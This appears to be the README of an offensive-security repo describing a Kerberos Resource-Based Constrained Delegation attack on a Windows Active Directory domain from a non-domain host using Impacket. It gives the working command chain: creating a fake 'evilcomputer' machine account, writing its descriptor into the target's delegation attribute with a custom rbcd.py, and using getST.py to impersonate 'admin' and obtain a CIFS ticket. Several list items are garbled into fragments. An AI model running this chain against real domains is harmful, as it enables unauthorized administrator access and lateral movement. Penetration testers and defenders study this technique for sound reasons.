Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket
This repo is about a practical attack against Kerberos Resource-Based Constrained Delegation in a Windows Active Directory Domain.
The difference from other common implementations is that we are launching the attack from outside of the Windows Domain, not from a domain joined (usually Windows) computer.
The attack is implemented using only Python3 Impacket (and its dependencies). Tested on Arch with up-to-date Impacket (0.9.21 as of writing).
In summary, without any deep details, the attack targets a domain computer, exactly service principals related to the target domain computer.
What we need here as prerequisites:
msDS-AllowedToActOnBehalfOfOtherIdentityproperty of the target computer domain object)
MachineAccountQuota)
The attack path in very high level:
msDS-AllowedToActOnBehalfOfOtherIdentityproperty of the target
Benefit:
The common toolsets for this attack operate on a domain-joined Windows Computer using:
abusing msDS-AllowedToActOnBehalfOfOtherIdentity
This implementation uses pure Impacket from outside the Domain.
Using addcomputer.py example from Impacket let's create a fake computer (called
evilcomputer):
addcomputer.py -computer-name 'evilcomputer$' -computer-pass [email protected] -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0
Implemented the script rbcd.py found here in the repo which adds the related security descriptor of the newly created EVILCOMPUTER to the
msDS-AllowedToActOnBehalfOfOtherIdentityproperty of the target computer.
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0
The script uses heavily the Python classes in the
ntlmrelayx.pyImpacket example. For help and an example call the script without options.
Now everything is ready for abusing the Constrained Delegation by an S4U2Self query and get an impersonated Service Ticket for the target computer. With
getST.pyImpacket example script:
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:[email protected]
The above command fetches a CIFS Service Ticket on behalf of the targetted domain user
adminand stores it in the file
admin.ccache.
After adding the file path to the KRB5CCNAME variable the ticket is usable for Kerberos clients.
export KRB5CCNAME=`pwd`/admin.ccache klist
For details about abusing Resource-Based Constrained Delegation:
And one of the most comprehensive presentations about Kerberos Attacks: